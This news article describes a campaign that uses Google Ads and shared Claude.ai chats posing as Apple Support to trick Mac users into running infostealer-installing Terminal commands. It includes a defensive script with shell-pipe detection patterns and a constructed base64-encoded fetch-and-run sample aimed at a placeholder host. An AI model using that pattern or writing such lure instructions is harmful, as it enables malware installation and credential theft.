TL;DR
Hackers are using Google Ads and legitimate Claude.ai shared chats to push Mac malware through a malvertising campaign. Researchers have confirmed malicious chat content and delivery methods, but the full scope remains unclear.
Cybercriminals are actively exploiting Google Ads and the shared chat feature of Claude.ai to distribute malware to Mac users, with researchers confirming malicious campaigns involving weaponized chats and malicious links.
Security engineer Berk Albayrak from Trendyol Group identified a shared Claude.ai chat that impersonates an ‘Apple Support’ guide, instructing users to open Terminal and run commands that silently download and execute malware on their Macs. BleepingComputer independently verified a second malicious chat with similar tactics, hosted on different domains and infrastructure.
The malware payloads, retrieved via base64-encoded shell scripts, are highly obfuscated and polymorphic, making detection difficult. One variant performs victim profiling by checking for Russian or CIS-region keyboard settings, then exfiltrates system information and credentials, including browser cookies and Keychain data. Another variant directly harvests sensitive data without profiling, resembling known macOS infostealers like MacSync.
Both campaigns rely on Google Ads that appear to promote legitimate links to claude.ai, but redirect users to malicious instructions hosted within shared chats. Researchers warn that these attacks leverage the trust in AI platforms and legitimate advertising to deceive users into executing harmful commands.
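As an added illustration (not code from the researchers or from BleepingComputer), the sketch below reviews a Terminal command copied from a chat or web page before it is run, flagging the delivery pattern described above: a base64-encoded script decoded and piped into a shell. The function names, patterns and sample commands are constructed for this example and are not signatures for the actual payloads.

```python
import base64
import re

# Patterns for the "decode or download, then pipe into a shell" delivery style.
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:/bin/|/usr/bin/)?(?:ba|z|da)?sh\b")
B64_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
FETCH = re.compile(r"\b(?:curl|wget)\b[^|;]*https?://", re.I)
# Long base64-looking runs (24+ characters) are candidates for decoding.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_blobs(command):
    """Return readable text recovered from base64-looking runs in the command."""
    out = []
    for blob in B64_BLOB.findall(command):
        try:
            text = base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8")
        except ValueError:  # covers bad base64 and non-UTF-8 output
            continue
        if text.strip() and all(c.isprintable() or c in "\n\t" for c in text):
            out.append(text)
    return out


def review_command(command):
    """Return a list of findings for a command copied from a web page or chat."""
    findings = []
    piped = bool(PIPE_TO_SHELL.search(command))
    if B64_DECODE.search(command) and piped:
        findings.append("base64 output piped to a shell")
    if FETCH.search(command) and piped:
        findings.append("download piped to a shell")
    for text in decode_blobs(command):
        if FETCH.search(text) or PIPE_TO_SHELL.search(text):
            findings.append("hidden stage: " + text.strip())
    return findings


# Constructed samples; example.invalid is a reserved, non-resolving name.
HIDDEN = "curl -fsSL https://example.invalid/stage2.sh | zsh"
ENCODED = base64.b64encode(HIDDEN.encode()).decode()
SUSPICIOUS = f'echo "{ENCODED}" | base64 -D | zsh'
BENIGN = "softwareupdate --list"

if __name__ == "__main__":
    for cmd in (SUSPICIOUS, BENIGN):
        print(cmd, "->", review_command(cmd) or "no findings")
```

The check decodes the embedded blob without executing it, so the reader sees the hidden second stage as text; an empty result means only that none of these patterns matched, not that the command is safe.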
Why It Matters
This campaign highlights the evolving tactics of cybercriminals exploiting AI platforms and advertising channels to target Mac users. The use of shared AI chats for malware delivery represents a new vector that bypasses traditional security measures, increasing the risk of data theft and system compromise. The incident underscores the importance of caution when following terminal instructions from unverified sources and the need for vigilance in digital advertising and AI platform security.

Background
Malvertising campaigns have previously targeted users searching for software like GIMP or ChatGPT, often using fake domains or phishing sites. This campaign is notable for abusing legitimate AI platform features and Google Ads, which are typically trusted by users. The technique of weaponizing shared AI chats is relatively new, with prior reports of similar abuse involving ChatGPT and Grok. Researchers advise users to download official apps directly from verified sources rather than following suspicious links or chat instructions.
“We found shared Claude chats that serve as attack vectors for malware, with instructions that appear legitimate but actually compromise Mac users.”
— Berk Albayrak, security engineer at Trendyol Group
“Both campaigns used Google Ads pointing to legitimate Claude.ai domains but hosted malicious instructions within shared chats, illustrating a sophisticated abuse of trusted platforms.”
— BleepingComputer

What Remains Unclear
It remains unclear how widespread the campaign is, whether other AI platforms are being similarly abused, or if additional variants of the malware are in circulation. The full scope and attribution of the attackers are still under investigation.

What’s Next
Security researchers and platform providers are expected to analyze the malware further, develop detection signatures, and strengthen defenses. Users are advised to avoid clicking on suspicious ads and to download software only from official sources. Ongoing monitoring will reveal whether the campaign expands or evolves.

Key Questions
How can I protect myself from this malware campaign?
Always download software from official sources, avoid clicking on suspicious ads, and be cautious when following terminal commands from unverified chats or websites. Keep your macOS and security software up to date.
Are all Google Ads related to Claude.ai malicious?
No, only specific ads promoting ‘Claude download Mac’ or similar keywords are involved. Users should verify the destination URL before clicking and avoid following instructions from untrusted chats.
Is this attack limited to Mac users?
Currently, the campaign appears targeted at Mac users, especially those searching for Claude.ai Mac downloads. There is no confirmed evidence of Windows or Linux targeting in this campaign.
What should I do if I suspect I’ve been compromised?
Disconnect from the internet, run a full security scan with updated antivirus tools, change compromised passwords, and avoid executing unknown terminal commands. Report the incident to security professionals if necessary.